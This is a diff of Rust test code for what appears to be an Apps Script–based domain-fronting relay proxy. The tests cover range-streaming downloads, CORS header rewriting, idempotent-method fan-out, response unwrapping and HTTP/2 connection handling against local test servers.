+        // lines do; the start-up summary phrases it differently).
+        //
+        // At 40 MiB total and 16 MiB intervals we expect two
+        // crossings — at 16 MiB and 32 MiB. Strictly *not* one at
+        // 0 MiB (the threshold must be reached, not just initialised)
+        // and *not* one at 40 MiB (40 < next_progress_log_at=48 once
+        // we've crossed 32 MiB).
+        use futures_util::stream;
+        use std::sync::{Arc, Mutex};
+        use tracing_subscriber::fmt::MakeWriter;
+
+        #[derive(Clone, Default)]
+        struct LogCapture(Arc<Mutex<Vec<u8>>>);
+        impl std::io::Write for LogCapture {
+            fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
+                self.0.lock().unwrap().extend_from_slice(buf);
+                Ok(buf.len())
+            }
+            fn flush(&mut self) -> std::io::Result<()> {
+                Ok(())
+            }
+        }
+        impl<'a> MakeWriter<'a> for LogCapture {
+            type Writer = Self;
+            fn make_writer(&'a self) -> Self::Writer {
+                self.clone()
+            }
+        }
+
+        let capture = LogCapture::default();
+        let subscriber = tracing_subscriber::fmt()
+            .with_writer(capture.clone())
+            .with_max_level(tracing::Level::INFO)
+            .with_ansi(false)
+            .with_target(false)
+            .finish();
+        let _guard = tracing::subscriber::set_default(subscriber);
+
+        // 40 MiB total. Probe is one 256 KiB chunk; the rest of the
+        // file is 159 same-sized chunks fed as a synthetic stream.
+        let chunk_size: u64 = 256 * 1024;
+        let total: u64 = 40 * 1024 * 1024;
+        let probe_body = vec![0u8; chunk_size as usize];
+        let mut chunks_data: Vec<(u64, u64, Result<Vec<u8>, &'static str>)> = Vec::new();
+        let mut start = chunk_size;
+        while start < total {
+            let end = (start + chunk_size - 1).min(total - 1);
+            let len = (end - start + 1) as usize;
+            chunks_data.push((start, end, Ok(vec![0u8; len])));
+            start = end + 1;
+        }
+        let head = format!("HTTP/1.1 200 OK\r\nContent-Length: {}\r\n\r\n", total).into_bytes();
+
+        let mut buf: Vec<u8> = Vec::new();
+        stream_chunks_to_writer(
+            &mut VecAsyncWriter(&mut buf),
+            &head,
+            &probe_body,
+            total,
+            stream::iter(chunks_data),
+            "https://example.test/big",
+        )
+        .await
+        .unwrap();
+        // Wire output sanity: head + 40 MiB body, exactly.
+        assert_eq!(buf.len() as u64, head.len() as u64 + total);
+
+        // Inspect the captured log. The two progress lines should
+        // mention `16/40` and `32/40` (MiB emitted / MiB total).
+        // Drop the subscriber guard so any inadvertent log lines
+        // from drop-handlers don't race with our read.
+        drop(_guard);
+        let log = String::from_utf8(capture.0.lock().unwrap().clone()).unwrap();
+        let progress_lines: Vec<&str> = log
+            .lines()
+            .filter(|l| l.contains("range-parallel-stream:") && l.contains(" MiB ("))
+            .collect();
+        assert_eq!(
+            progress_lines.len(),
+            2,
+            "expected 2 progress lines at the 16 / 32 MiB crossings; full log:\n{}",
+            log,
+        );
+        assert!(
+            progress_lines[0].contains("16/40 MiB (40%)"),
+            "first progress line should read 16/40 MiB (40%); got: {}",
+            progress_lines[0],
+        );
+        assert!(
+            progress_lines[1].contains("32/40 MiB (80%)"),
+            "second progress line should read 32/40 MiB (80%); got: {}",
+            progress_lines[1],
+        );
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_flushes_after_head_and_probe_for_first_byte_latency() {
+        // "First bytes quickly" lock-in: after writing head + probe
+        // body, the function must flush before going into the
+        // chunk-fetch loop. Without this, the response start
+        // (status code, headers, first 256 KiB of body) may sit in
+        // intermediate buffers (TLS writer, kernel send buffer with
+        // small initial cwnd, intermediate proxy buffers) while we
+        // round-trip ~2s/chunk to Apps Script for the remaining
+        // chunks — giving the user a "stuck at 0%" progress bar
+        // for hundreds of ms to seconds on a multi-MiB download.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 14\r\n\r\n";
+        let probe = b"AB";
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Ok::<Vec<u8>, &'static str>(b"GHIJ".to_vec())),
+            (10u64, 13u64, Ok::<Vec<u8>, &'static str>(b"KLMN".to_vec())),
+        ]);
+        let mut writer = FlushTrackingWriter::new();
+        stream_chunks_to_writer(
+            &mut writer,
+            head,
+            probe,
+            14,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await
+        .unwrap();
+
+        // At least one flush must land at byte offset = head + probe
+        // (BEFORE any chunk bytes), proving the early flush ran.
+        let head_plus_probe = head.len() + probe.len();
+        assert!(
+            writer.flushed_at.iter().any(|&at| at == head_plus_probe),
+            "early flush must run after head+probe but before chunks; flushed_at={:?}, expected at byte {}",
+            writer.flushed_at,
+            head_plus_probe,
+        );
+    }
+
+    #[tokio::test]
+    async fn streaming_branch_with_real_cors_transform_emits_acl_headers_then_body() {
+        // Cross-module integration test: the streaming branch's
+        // `transform_head` closure is wired up in proxy_server.rs
+        // from the request's Origin header to call
+        // `inject_cors_into_head`. Helper tests cover the head
+        // assembler and the CORS rewriter in isolation; this test
+        // composes them as the production proxy dispatch does, so
+        // a regression in either the closure construction or the
+        // head-only CORS variant surfaces here.
+        use crate::proxy_server::inject_cors_into_head;
+        use futures_util::stream::{self, StreamExt as _};
+
+        let cors_origin: Option<String> = Some("https://www.youtube.com".to_string());
+        // Same closure the proxy_server dispatch uses (see
+        // proxy_server.rs `handle_mitm_request`).
+        let transform = |head: &[u8]| -> Vec<u8> {
+            match cors_origin.as_deref() {
+                Some(o) => inject_cors_into_head(head, o).unwrap_or_else(|| head.to_vec()),
+                None => head.to_vec(),
+            }
+        };
+
+        let probe_headers = vec![
+            ("Content-Type".to_string(), "application/octet-stream".to_string()),
+            ("Content-Range".to_string(), "bytes 0-3/12".to_string()),
+            // Origin sent ACL=* with credentials — exactly the YouTube
+            // comments failure mode `inject_cors_response_headers`
+            // was added to fix. The streaming-path CORS variant must
+            // strip this and substitute the request origin.
+            ("Access-Control-Allow-Origin".to_string(), "*".to_string()),
+        ];
+        let probe_body = b"ABCD";
+        let chunks = stream::iter(vec![
+            (4u64, 7u64, Ok::<Vec<u8>, &'static str>(b"EFGH".to_vec())),
+            (8u64, 11u64, Ok::<Vec<u8>, &'static str>(b"IJKL".to_vec())),
+        ]);
+        let mut buf: Vec<u8> = Vec::new();
+        stream_range_response_to(
+            &mut VecAsyncWriter(&mut buf),
+            &probe_headers,
+            probe_body,
+            12,
+            chunks.map(|x| x),
+            &transform,
+            "https://example.test/big-file",
+        )
+        .await
+        .unwrap();
+
+        let sep_pos = buf.windows(4).position(|w| w == b"\r\n\r\n").expect("head terminator");
+        let head_s = std::str::from_utf8(&buf[..sep_pos + 4]).unwrap();
+        let body = &buf[sep_pos + 4..];
+
+        // Wildcard origin is gone; request origin is echoed.
+        assert!(
+            !head_s.contains("Access-Control-Allow-Origin: *"),
+            "wildcard origin must be stripped, head was: {}", head_s,
+        );
+        assert!(head_s.contains("Access-Control-Allow-Origin: https://www.youtube.com\r\n"));
+        assert!(head_s.contains("Access-Control-Allow-Credentials: true\r\n"));
+        assert!(head_s.contains("Vary: Origin\r\n"));
+        // Synthesised Content-Length = full advertised total.
+        assert!(head_s.contains("Content-Length: 12\r\n"));
+        // Body unaffected by the head transform; chunks in order.
+        assert_eq!(body, b"ABCDEFGHIJKL");
+    }
+
+    #[tokio::test]
+    async fn stream_range_response_to_assembles_head_from_probe_and_streams_chunks() {
+        // Integration test for the streaming-branch wiring in
+        // `do_relay_parallel_range_to`: given a probe response (the
+        // probe's response headers + first-chunk body), a known
+        // total, and a stream of remaining chunk results, the
+        // streaming branch must:
+        //   1. Build the response head from the probe headers via
+        //      `assemble_200_head` (keeps Content-Type etc., strips
+        //      Content-Range and writes Content-Length=total).
+        //   2. Apply the caller's `transform_head` closure to the
+        //      assembled head (e.g. CORS injection).
+        //   3. Write head → probe body → chunks (in input order)
+        //      with no reordering, no body buffering.
+        //
+        // Helper-only tests can miss the composition wiring
+        // (assemble + transform + stream_chunks); this test
+        // exercises all three together through the same free
+        // function the production dispatch uses.
+        use futures_util::stream::{self, StreamExt as _};
+        let probe_headers = vec![
+            ("Content-Type".to_string(), "application/octet-stream".to_string()),
+            ("Content-Range".to_string(), "bytes 0-3/12".to_string()),
+            ("Content-Length".to_string(), "4".to_string()),
+            ("X-Origin-Hint".to_string(), "abcd".to_string()),
+        ];
+        let probe_body = b"ABCD";
+        let total: u64 = 12;
+        let chunks = stream::iter(vec![
+            (4u64, 7u64, Ok::<Vec<u8>, &'static str>(b"EFGH".to_vec())),
+            (8u64, 11u64, Ok::<Vec<u8>, &'static str>(b"IJKL".to_vec())),
+        ]);
+        let transform = |head: &[u8]| -> Vec<u8> {
+            // Append a synthetic CORS-style header so we can assert
+            // the transform actually got the head bytes, not the
+            // probe body.
+            let sep = b"\r\n\r\n";
+            let mut out = head.strip_suffix(sep).unwrap_or(head).to_vec();
+            out.extend_from_slice(b"\r\nX-Transform: applied\r\n\r\n");
+            out
+        };
+        let mut buf: Vec<u8> = Vec::new();
+        stream_range_response_to(
+            &mut VecAsyncWriter(&mut buf),
+            &probe_headers,
+            probe_body,
+            total,
+            chunks.map(|x| x),
+            &transform,
+            "https://example.test/big-file",
+        )
+        .await
+        .unwrap();
+
+        let sep_pos = buf.windows(4).position(|w| w == b"\r\n\r\n").expect("head terminator");
+        let head = &buf[..sep_pos + 4];
+        let body = &buf[sep_pos + 4..];
+        let head_s = std::str::from_utf8(head).unwrap();
+
+        // Composition #1: assemble_200_head ran with the probe
+        // headers and the full total.
+        assert!(head_s.starts_with("HTTP/1.1 200 OK\r\n"));
+        assert!(head_s.contains("Content-Length: 12\r\n"));
+        // Original Content-Length from the probe (=4) must be gone.
+        assert!(!head_s.contains("Content-Length: 4\r\n"));
+        // Content-Range is stripped (it described the probe slice,
+        // not the synthesised full response).
+        assert!(!head_s.contains("Content-Range:"));
+        // Non-stripped probe headers pass through.
+        assert!(head_s.contains("Content-Type: application/octet-stream\r\n"));
+        assert!(head_s.contains("X-Origin-Hint: abcd\r\n"));
+
+        // Composition #2: transform_head ran on the assembled head.
+        assert!(head_s.contains("X-Transform: applied\r\n"));
+
+        // Composition #3: body is probe_body followed by chunks in
+        // input order, with no reordering or interleaving.
+        assert_eq!(body, b"ABCDEFGHIJKL");
+    }
+
+    #[tokio::test]
+    async fn stream_range_response_to_propagates_mid_stream_chunk_failure() {
+        // Integration counterpart: the streaming branch must
+        // propagate a mid-stream chunk failure as Err, and the
+        // committed prefix (head + probe + earlier-good chunks)
+        // must already be on the wire so the download client can
+        // resume via Range. Combined with the flush test above,
+        // this gives end-to-end coverage of the failure surface.
+        use futures_util::stream::{self, StreamExt as _};
+        let probe_headers = vec![
+            ("Content-Type".to_string(), "application/octet-stream".to_string()),
+            ("Content-Range".to_string(), "bytes 0-3/12".to_string()),
+        ];
+        let probe_body = b"ABCD";
+        let chunks = stream::iter(vec![
+            (4u64, 7u64, Ok::<Vec<u8>, &'static str>(b"EFGH".to_vec())),
+            (8u64, 11u64, Err::<Vec<u8>, &'static str>("chunk validation failure")),
+        ]);
+        let identity = |head: &[u8]| head.to_vec();
+        let mut buf: Vec<u8> = Vec::new();
+        let result = stream_range_response_to(
+            &mut VecAsyncWriter(&mut buf),
+            &probe_headers,
+            probe_body,
+            12,
+            chunks.map(|x| x),
+            &identity,
+            "https://example.test/big-file",
+        )
+        .await;
+        assert!(result.is_err(), "mid-stream chunk failure must propagate as Err");
+
+        let sep_pos = buf.windows(4).position(|w| w == b"\r\n\r\n").expect("head terminator");
+        let body = &buf[sep_pos + 4..];
+        // Committed prefix: probe + first good chunk. NOT the failed
+        // chunk and NOT any "after-failure" chunks (there aren't any
+        // in this test, but the contract is "stop on first error").
+        assert_eq!(body, b"ABCDEFGH");
+    }
+
+    #[tokio::test]
+    async fn stream_chunks_to_writer_aborts_on_chunk_validation_failure() {
+        // Mid-stream chunk failure must return Err *after* the head,
+        // probe body, and earlier successful chunks have been
+        // committed. Single-GET fallback isn't possible at this point
+        // — we've already written wire bytes — and partial write +
+        // Err is what the caller (TLS socket) needs to surface a
+        // Content-Length mismatch to the download client so it
+        // retries via Range from the partial position.
+        use futures_util::stream::{self, StreamExt as _};
+        let head = b"HTTP/1.1 200 OK\r\nContent-Length: 12\r\n\r\n";
+        let probe = b"AB";
+        let fetches = stream::iter(vec![
+            (2u64, 5u64, Ok::<Vec<u8>, &'static str>(b"CDEF".to_vec())),
+            (6u64, 9u64, Err::<Vec<u8>, &'static str>("Content-Range/body length mismatch")),
+            // This third chunk must NOT be written — the function must
+            // bail on the first Err.
+            (10u64, 11u64, Ok::<Vec<u8>, &'static str>(b"KL".to_vec())),
+        ]);
+        let mut buf = Vec::new();
+        let result = stream_chunks_to_writer(
+            &mut VecAsyncWriter(&mut buf),
+            head,
+            probe,
+            12,
+            fetches.map(|x| x),
+            "https://example.test/file",
+        )
+        .await;
+        assert!(result.is_err(), "must return Err on first chunk failure");
+        // Bytes already committed up to (but not past) the failure:
+        // head + probe + successfully-validated chunk 1.
+        let expected: Vec<u8> = [head.as_slice(), probe.as_slice(), b"CDEF"].concat();
+        assert_eq!(
+            buf, expected,
+            "post-failure chunks must not be written; partial body length tells client to retry"
+        );
+    }
+
+    #[test]
+    fn parse_relay_error_field() {
+        let body = r#"{"e":"unauthorized"}"#;
         let err = parse_relay_json(body.as_bytes()).unwrap_err();
         assert!(matches!(err, FronterError::Relay(_)));
     }
@@ -2476,6 +6314,9 @@ hello";
         assert!(!should_blacklist(200, ""));
         assert!(!should_blacklist(502, "bad gateway"));
         assert!(looks_like_quota_error("Exception: Service invoked too many times per day"));
+        assert!(looks_like_quota_error(
+            "Exception: Bandbreitenkontingent überschritten: https://example.com. Verringern Sie die Datenübertragungsrate."
+        ));
         assert!(!looks_like_quota_error("bad url"));
     }
 
@@ -2485,6 +6326,38 @@ hello";
         assert_eq!(mask_script_id("AKfycbx1234567890abcdef"), "AKfy...cdef");
     }
 
+    #[test]
+    fn parallel_relay_only_safe_for_idempotent_methods() {
+        // Locks down #743: parallel_relay must never fan-out non-idempotent
+        // methods because Apps Script can't be cancelled mid-request, so
+        // every concurrent attempt completes server-side and side-effects
+        // duplicate at the destination (comment posted twice, etc.).
+        for safe in ["GET", "HEAD", "OPTIONS", "get", "head", "options"] {
+            assert!(
+                is_method_safe_for_fanout(safe),
+                "{} should be safe for fan-out (idempotent per RFC 9110)",
+                safe,
+            );
+        }
+        for unsafe_m in ["POST", "PUT", "PATCH", "DELETE", "post", "put", "patch", "delete"] {
+            assert!(
+                !is_method_safe_for_fanout(unsafe_m),
+                "{} must NOT be safe for fan-out (non-idempotent — duplicate side-effects)",
+                unsafe_m,
+            );
+        }
+        // Unknown methods (CONNECT, TRACE, custom verbs) default to NOT
+        // safe — conservative call, matches the upstream `UrlFetchApp`
+        // lookup behavior.
+        for unknown in ["CONNECT", "TRACE", "PROPFIND", ""] {
+            assert!(
+                !is_method_safe_for_fanout(unknown),
+                "{} must default to NOT safe for fan-out when unrecognised",
+                unknown,
+            );
+        }
+    }
+
     #[test]
     fn parse_relay_array_set_cookie() {
         let body = r#"{"s":200,"h":{"Set-Cookie":["a=1","b=2"]},"b":""}"#;
@@ -2494,6 +6367,73 @@ hello";
         assert!(s.contains("Set-Cookie: b=2\r\n"));
     }
 
+    #[test]
+    fn decode_js_string_escapes_xnn_and_unicode() {
+        // \x7b = '{', \x22 = '"', \x7d = '}', \x5b = '[', \x5d = ']'
+        let inner = r#"\x7b\x22s\x22:200,\x22b\x22:\x22\x22\x7d"#;
+        let out = decode_js_string_escapes(inner).unwrap();
+        assert_eq!(out, r#"{"s":200,"b":""}"#);
+
+        // A = 'A', mixed with literal
+        assert_eq!(decode_js_string_escapes(r"ABC").unwrap(), "ABC");
+
+        // standard escapes
+        assert_eq!(decode_js_string_escapes(r#"a\nb\t\\\"c"#).unwrap(), "a\nb\t\\\"c");
+
+        // truncated escape returns None instead of panicking
+        assert!(decode_js_string_escapes(r"\x7").is_none());
+        assert!(decode_js_string_escapes(r"\u00").is_none());
+    }
+
+    /// Hand-build the `goog.script.init("...", "", undefined)` wrapper for
+    /// a given inner relay JSON, matching the form Apps Script HtmlService
+    /// emits when the deployment uses HtmlService for its response. Every
+    /// `{`/`}` becomes `\x7b`/`\x7d`, every `"` becomes `\"`, every `:`
+    /// stays — that's the realistic subset our unwrapper has to cope with.
+    fn build_goog_script_init_wrapper(inner_relay_json: &str) -> String {
+        // Step 1: build the outer JSON object {"userHtml": "<inner>", ...}
+        // using serde so the inner JSON is properly JSON-escaped (including
+        // each `"` → `\"`).
+        let outer = serde_json::json!({ "userHtml": inner_relay_json });
+        let outer_str = serde_json::to_string(&outer).unwrap();
+        // Step 2: re-escape `{`/`}` → `\xNN` and `"` → `\"` to match the
+        // form Apps Script wraps inside the `goog.script.init("…")`
+        // JS string literal.
+        let mut wire = String::with_capacity(outer_str.len() * 2);
+        for ch in outer_str.chars() {
+            match ch {
+                '{' => wire.push_str(r"\x7b"),
+                '}' => wire.push_str(r"\x7d"),
+                '"' => wire.push_str(r#"\""#),
+                other => wire.push(other),
+            }
+        }
+        format!(
+            "<html><body><script>goog.script.init(\"{}\", \"\", undefined);</script></body></html>",
+            wire
+        )
+    }
+
+    #[test]
+    fn extract_apps_script_user_html_unwraps_goog_init() {
+        let inner_json = r#"{"s":200,"h":{},"b":"aGk="}"#;
+        let wrapped = build_goog_script_init_wrapper(inner_json);
+        let extracted = extract_apps_script_user_html(&wrapped).unwrap();
+        assert_eq!(extracted, inner_json);
+    }
+
+    #[test]
+    fn parse_relay_json_unwraps_goog_script_init() {
+        // End-to-end: an iframe-wrapped body should still parse correctly
+        // through parse_relay_json. Without the unwrap helper this used
+        // to fail with `key must be a string at line 2`.
+        let inner_json = r#"{"s":200,"h":{},"b":""}"#;
+        let wrapped = build_goog_script_init_wrapper(inner_json);
+        let raw = parse_relay_json(wrapped.as_bytes()).unwrap();
+        let s = String::from_utf8_lossy(&raw);
+        assert!(s.starts_with("HTTP/1.1 200 "), "got: {}", s);
+    }
+
     #[tokio::test(flavor = "current_thread")]
     async fn chunked_reader_consumes_final_crlf_and_trailers() {
         let (mut client, mut server) = duplex(1024);
@@ -2571,4 +6511,710 @@ hello";
             other => panic!("unexpected error: {}", other),
         }
     }
+
+    // ─── h2 transport ──────────────────────────────────────────────────
+
+    /// Generous response-phase deadline used by transport tests. We
+    /// pick something well above any expected latency on a localhost
+    /// h2c hop so test flakiness can't be confused with a real timeout
+    /// firing. Tests that *want* to observe a timeout pick a small
+    /// value explicitly.
+    const TEST_RESPONSE_DEADLINE: Duration = Duration::from_secs(10);
+
+    /// Build a minimal valid `DomainFronter` for unit tests. The
+    /// `connect_host` is unused unless a test actually opens a socket;
+    /// `verify_ssl=true` and a placeholder `google_ip` are fine because
+    /// `DomainFronter::new` doesn't touch the network.
+    fn fronter_for_test(force_http1: bool) -> DomainFronter {
+        let json = format!(
+            r#"{{
+                "mode": "apps_script",
+                "google_ip": "127.0.0.1",
+                "front_domain": "www.google.com",
+                "script_id": "TEST",
+                "auth_key": "test_auth_key",
+                "listen_host": "127.0.0.1",
+                "listen_port": 8085,
+                "log_level": "info",
+                "verify_ssl": true,
+                "force_http1": {}
+            }}"#,
+            force_http1
+        );
+        let cfg: Config = serde_json::from_str(&json).unwrap();
+        DomainFronter::new(&cfg).expect("test fronter must construct")
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn force_http1_disables_h2_at_construction() {
+        // The kill switch: force_http1=true must mark the fronter as
+        // h2-disabled before the first call so ensure_h2 short-circuits
+        // without ever trying ALPN.
+        let fronter = fronter_for_test(true);
+        assert!(
+            fronter.h2_disabled.load(Ordering::Relaxed),
+            "force_http1=true must set h2_disabled at construction"
+        );
+        assert!(
+            fronter.ensure_h2().await.is_none(),
+            "ensure_h2 must return None when h2 is disabled"
+        );
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn force_http1_false_leaves_h2_enabled() {
+        let fronter = fronter_for_test(false);
+        assert!(
+            !fronter.h2_disabled.load(Ordering::Relaxed),
+            "default must leave h2 enabled"
+        );
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn poison_h2_if_gen_is_noop_when_cell_is_empty() {
+        // Defensive: we call poison on every per-request error; cell
+        // may already be None due to a concurrent poison. Must not
+        // panic or wedge.
+        let fronter = fronter_for_test(false);
+        fronter.poison_h2_if_gen(0).await;
+        let cell = fronter.h2_cell.lock().await;
+        assert!(cell.is_none());
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn poison_h2_if_gen_only_clears_matching_generation() {
+        // Race protection: task A holds gen=1 SendRequest, gen=1 dies,
+        // task B reopens → cell now gen=2 (healthy). Task A's
+        // poison(1) MUST NOT clear gen=2. Without generation matching
+        // the previous code unconditionally cleared the cell, causing
+        // connection churn during recovery.
+        let (addr, server_handle) = spawn_h2c_server(|_req| {
+            let resp = http::Response::builder().status(200).body(()).unwrap();
+            (resp, Vec::new())
+        })
+        .await;
+        let send_v2 = h2c_client(addr).await;
+
+        let fronter = fronter_for_test(false);
+        // Seed the cell with gen=2 (simulating "task B just reopened").
+        {
+            let mut cell = fronter.h2_cell.lock().await;
+            *cell = Some(H2Cell {
+                send: send_v2.clone(),
+                created: Instant::now(),
+                generation: 2,
+                dead: Arc::new(AtomicBool::new(false)),
+            });
+        }
+        // Task A poisons with stale gen=1.
+        fronter.poison_h2_if_gen(1).await;
+        // gen=2 cell must survive.
+        let cell = fronter.h2_cell.lock().await;
+        assert!(
+            cell.is_some(),
+            "poison_h2_if_gen(1) must not clear gen=2 cell"
+        );
+        assert_eq!(cell.as_ref().unwrap().generation, 2);
+        drop(cell);
+
+        // And matching gen=2 actually does clear.
+        fronter.poison_h2_if_gen(2).await;
+        let cell = fronter.h2_cell.lock().await;
+        assert!(cell.is_none(), "poison_h2_if_gen(2) must clear gen=2 cell");
+
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn ensure_h2_rejects_dead_cell_within_ttl() {
+        // Cell is within H2_CONN_TTL_SECS but the connection driver
+        // already flipped `dead` (e.g., upstream sent GOAWAY). Without
+        // the dead-flag check `ensure_h2` would happily hand out the
+        // stale SendRequest and the next request would pay a wasted
+        // h2 round trip to discover the breakage. With the check in
+        // place a second pre-existing healthy cell still works fine —
+        // the dead one is replaced via the open-lock path.
+        let (addr, server_handle) = spawn_h2c_server(|_req| {
+            let resp = http::Response::builder().status(200).body(()).unwrap();
+            (resp, Vec::new())
+        })
+        .await;
+        let send = h2c_client(addr).await;
+
+        let fronter = fronter_for_test(false);
+        let dead = Arc::new(AtomicBool::new(true)); // simulate driver having exited
+        {
+            let mut cell = fronter.h2_cell.lock().await;
+            *cell = Some(H2Cell {
+                send,
+                created: Instant::now(), // well within TTL
+                generation: 1,
+                dead: dead.clone(),
+            });
+        }
+
+        // The fast path normally returns Some(send, gen) when the cell
+        // is within TTL. With dead=true it must NOT return the stale
+        // SendRequest. Pre-set the failure-backoff timestamp so
+        // ensure_h2 short-circuits at the backoff check (no network
+        // I/O) regardless of whatever's bound on 127.0.0.1:443 on the
+        // dev/CI host. This isolates the assertion to the new
+        // dead-flag check.
+        *fronter.h2_open_failed_at.lock().await = Some(Instant::now());
+
+        let result = fronter.ensure_h2().await;
+        assert!(
+            result.is_none(),
+            "ensure_h2 must not serve a cell whose driver flipped `dead`"
+        );
+
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn ensure_h2_skips_reopen_during_failure_backoff() {
+        // After an open failure, ensure_h2 must return None for at
+        // least H2_OPEN_FAILURE_BACKOFF_SECS without attempting a
+        // new handshake — otherwise concurrent callers each pay the
+        // full handshake-timeout cost during an outage.
+        let fronter = fronter_for_test(false);
+        // Simulate a recent open failure.
+        *fronter.h2_open_failed_at.lock().await = Some(Instant::now());
+
+        // ensure_h2 must return None immediately, without trying open_h2
+        // (open_h2 would try TCP-connect to 127.0.0.1:443 which would
+        // either fail slowly or succeed against an unrelated service —
+        // either way, this test would observably take longer if backoff
+        // wasn't honored).
+        let t0 = Instant::now();
+        let result = fronter.ensure_h2().await;
+        assert!(result.is_none(), "must return None during backoff");
+        assert!(
+            t0.elapsed() < Duration::from_millis(100),
+            "must return immediately without open attempt; took {:?}",
+            t0.elapsed()
+        );
+    }
+
+    /// Spawn a minimal local h2c server (plaintext h2, no TLS) on a
+    /// random port. The handler closure builds the response from the
+    /// incoming request — used by `h2_round_trip_*` tests below.
+    /// Returns the bound address and the JoinHandle so the test can
+    /// `abort()` the server when done.
+    async fn spawn_h2c_server<F>(
+        handler: F,
+    ) -> (std::net::SocketAddr, tokio::task::JoinHandle<()>)
+    where
+        F: Fn(http::Request<h2::RecvStream>) -> (http::Response<()>, Vec<u8>)
+            + Send
+            + Sync
+            + 'static,
+    {
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let handler = Arc::new(handler);
+        let handle = tokio::spawn(async move {
+            // Single-connection server is enough for these tests.
+            let (sock, _) = listener.accept().await.unwrap();
+            let mut connection = h2::server::handshake(sock).await.unwrap();
+            while let Some(result) = connection.accept().await {
+                let (req, mut respond) = match result {
+                    Ok(v) => v,
+                    Err(_) => break,
+                };
+                let (resp, body) = handler(req);
+                let has_body = !body.is_empty();
+                let mut send = respond
+                    .send_response(resp, !has_body)
+                    .expect("send_response in test");
+                if has_body {
+                    send.send_data(Bytes::from(body), true)
+                        .expect("send_data in test");
+                }
+            }
+        });
+        (addr, handle)
+    }
+
+    /// Variant that gives the handler async access to the request body
+    /// before producing the response. Needed to assert what the client
+    /// actually sent (rather than relying on the request's existence).
+    async fn spawn_h2c_echo_server() -> (std::net::SocketAddr, tokio::task::JoinHandle<()>) {
+        let listener = tokio::net::TcpListener::bind("127.0.0.1:0").await.unwrap();
+        let addr = listener.local_addr().unwrap();
+        let handle = tokio::spawn(async move {
+            let (sock, _) = listener.accept().await.unwrap();
+            let mut connection = h2::server::handshake(sock).await.unwrap();
+            while let Some(result) = connection.accept().await {
+                let (req, mut respond) = match result {
+                    Ok(v) => v,
+                    Err(_) => break,
+                };
+                let mut body = req.into_body();
+                let mut received = Vec::new();
+                while let Some(chunk) = body.data().await {
+                    let chunk = match chunk {
+                        Ok(c) => c,
+                        Err(_) => break,
+                    };
+                    let n = chunk.len();
+                    received.extend_from_slice(&chunk);
+                    let _ = body.flow_control().release_capacity(n);
+                }
+                let resp = http::Response::builder().status(200).body(()).unwrap();
+                let mut send = respond.send_response(resp, false).unwrap();
+                send.send_data(Bytes::from(received), true).unwrap();
+            }
+        });
+        (addr, handle)
+    }
+
+    /// Open a plaintext h2c connection to `addr` and return a usable
+    /// `SendRequest<Bytes>`. The connection driver is spawned in the
+    /// background and lives for the test's scope.
+    async fn h2c_client(addr: std::net::SocketAddr) -> h2::client::SendRequest<Bytes> {
+        let stream = TcpStream::connect(addr).await.unwrap();
+        let (send, conn) = h2::client::handshake(stream).await.unwrap();
+        tokio::spawn(async move {
+            let _ = conn.await;
+        });
+        send
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn h2_round_trip_actually_transmits_post_body() {
+        // Server reads the request body and echoes it. We assert the
+        // server received the exact bytes we passed — proves the
+        // send_data path works, not just that 200 came back.
+        let (addr, server_handle) = spawn_h2c_echo_server().await;
+
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+        let req_body = b"the-actual-payload-sent-by-h2_round_trip";
+        let (status, _hdrs, echoed) = fronter
+            .h2_round_trip(
+                send,
+                "POST",
+                "/echo",
+                "127.0.0.1",
+                Bytes::from_static(req_body),
+                Some("application/json"),
+                TEST_RESPONSE_DEADLINE,
+            )
+            .await
+            .expect("h2 round trip should succeed");
+        assert_eq!(status, 200);
+        assert_eq!(
+            echoed, req_body,
+            "server must have received the exact bytes we sent"
+        );
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn h2_round_trip_decodes_gzip_responses() {
+        // Mirror the h1 read_http_response behavior: gzip-encoded
+        // bodies must be transparently decompressed before we hand
+        // them back, so downstream JSON parsers see plain bytes
+        // regardless of transport.
+        use flate2::write::GzEncoder;
+        use flate2::Compression;
+        use std::io::Write;
+
+        let plain = b"{\"hello\":\"world\"}";
+        let mut enc = GzEncoder::new(Vec::new(), Compression::default());
+        enc.write_all(plain).unwrap();
+        let gzipped = enc.finish().unwrap();
+        let gzipped_arc = Arc::new(gzipped);
+
+        let g = gzipped_arc.clone();
+        let (addr, server_handle) = spawn_h2c_server(move |_req| {
+            let resp = http::Response::builder()
+                .status(200)
+                .header("content-encoding", "gzip")
+                .body(())
+                .unwrap();
+            (resp, (*g).clone())
+        })
+        .await;
+
+        let send = h2c_client(addr).await;
+        let fronter = fronter_for_test(false);
+        let (status, _hdrs, body) = fronter
+            .h2_round_trip(send, "GET", "/", "127.0.0.1", Bytes::new(), None, TEST_RESPONSE_DEADLINE)
+            .await
+            .unwrap();
+        assert_eq!(status, 200);
+        assert_eq!(body, plain, "gzip body must be decoded transparently");
+        server_handle.abort();
+    }
+
+    #[tokio::test(flavor = "current_thread")]
+    async fn run_h2_relay_with_send_follows_redirect_chain() {
+        // Now exercises run_h2_relay_with_send (the testable inner
+        // of h2_relay_request) so the production redirect loop —
+        // including timeout, RequestSent classification, and per-hop
+        // poison-by-gen — is actually under test, not a hand-rolled
+        // duplicate.
+        let counter = Arc::new(std::sync::atomic::AtomicUsize::new(0));
+        let c = counter.clone();
+        let (addr, server_handle) = spawn_h2c_server(move |req| {
+            let n = c.fetch_add(1, Ordering::Relaxed);
+            if n == 0 {
+                let resp = http::Response::builder()
+                    .status(302)
+                    .header("location", "/next")
+                    .body(())
